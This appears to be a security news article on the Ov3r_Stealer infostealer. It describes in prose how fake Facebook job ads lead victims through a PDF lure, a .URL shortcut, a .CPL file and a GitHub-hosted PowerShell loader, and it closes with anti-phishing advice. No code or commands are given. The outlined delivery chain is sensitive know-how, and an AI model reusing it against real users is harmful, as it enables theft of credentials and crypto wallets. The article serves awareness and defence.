Ov3r_Stealer Malware

Threat actors are exploiting bogus job advertisements on Facebook to deceive potential victims into unwittingly installing a new Windows-based malware known as Ov3r_Stealer. This threatening software is specifically crafted to pilfer credentials and crypto wallets, forwarding the collected data to a Telegram channel monitored by the threat actor.

Ov3r_Stealer exhibits a wide range of capabilities, including the extraction of IP address-based location, hardware information, passwords, cookies, credit card details, auto-fill data, browser extensions, crypto wallets, Microsoft Office documents, and a list of installed security products on the compromised host.

Although the ultimate objective of this campaign remains unclear, the obtained information is probably being offered for sale to other threat actors. Alternatively, Ov3r_Stealer may undergo updates over time, potentially transforming into a loader similar to QakBot, facilitating the deployment of additional payloads, such as ransomware.

The Attack Chain Deploying the Ov3r_Stealer Malware

The attack begins with a weaponized PDF file, falsely presenting itself as a document stored on OneDrive. It encourages users to click an 'Access Document' button embedded within. Researchers have pinpointed the distribution of this PDF file through a deceptive Facebook account posing as Amazon CEO Andy Jassy and fraudulent Facebook ads advertising digital advertising positions.

Upon clicking the button, users receive an internet shortcut (.URL) file disguised as a DocuSign document hosted on Discord's content delivery network (CDN). This shortcut file serves as a pathway to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary ('control.exe').

Executing the CPL file initiates the retrieval of a PowerShell loader ('DATA1.txt') from a GitHub repository, ultimately leading to the launch of Ov3r_Stealer.

Similarities Between Ov3r_Stealer and Other Malware Threats

Cybersecurity researchers highlight that threat actors employed a nearly identical infection chain to deploy another stealer known as the Phemedrone Stealer, exploiting the Microsoft Windows Defender SmartScreen bypass vulnerability (CVE-2023-36025, CVSS score: 8.8). The resemblance extends further, with the utilization of the GitHub repository (nateeintanan2527) and the presence of code-level similarities between Ov3r_Stealer and Phemedrone. It is conceivable that Phemedrone has undergone repurposing and rebranding as Ov3r_Stealer, with the primary distinction being that Phemedrone is coded in C#.

To reinforce the linkages between the two stealer malware, the threat actor has been observed sharing news reports about the Phemedrone Stealer on their Telegram channels to enhance the 'street cred' of their malware-as-a-service (MaaS) business.

One of the messages observed reads, 'My custom stealer is making headlines, showcasing its evasiveness. I'm the developer behind it, so thrilled right now.' The threat actors express frustration over the fact that despite their efforts to keep everything 'in memory,' threat hunters managed to 'reverse the entire exploit chain.'

How can You Avoid Phishing Attacks that Deliver Malware Threats?

Avoiding phishing attacks that deliver malware threats requires a combination of vigilance, awareness, and the adoption of best practices for online security. Here are some key steps users can take to safeguard themselves from falling victim to phishing attacks:

• Be Skeptical of Unsolicited Emails: Avoid opening emails from unknown senders.
• Be cautious even if the email appears to come from a known source; verify the sender's email address if in doubt.
•  Verify URLs and Links: Hover over email links to preview the URL before clicking.
• Verify the website's legitimacy by comparing the URL in the email to the official website's address.
•  Check Email Content for Red Flags: Look for spelling and grammar errors, which can indicate phishing attempts. Be wary of urgent or threatening language that pressures you to take immediate action.
•  Update and Use Security Software: Keep your operating system, anti-malware software, and applications current. Use reputable security software to provide real-time protection against malware.
•  Prepare Yourself and Stay Informed: Stay informed about the latest phishing tactics and malware threats. Educate yourself on common phishing indicators, such as generic greetings and requests for sensitive information.
•  Be Cautious with Attachments: Avoid opening attachments from unknown or unexpected sources. Corroborate the legitimacy of the sender before downloading or opening attachments.
•  Watch for Social Engineering Tactics: Be cautious of requests for sensitive information, especially passwords or financial details. Verify the identity of individuals or organizations making unusual requests through a trusted channel.

By incorporating these practices into your online behavior, you can shorten the risk of falling victim to phishing attacks delivering malware threats significantly. Staying vigilant and continually updating your knowledge on cybersecurity best practices is crucial in the ever-evolving landscape of online threats.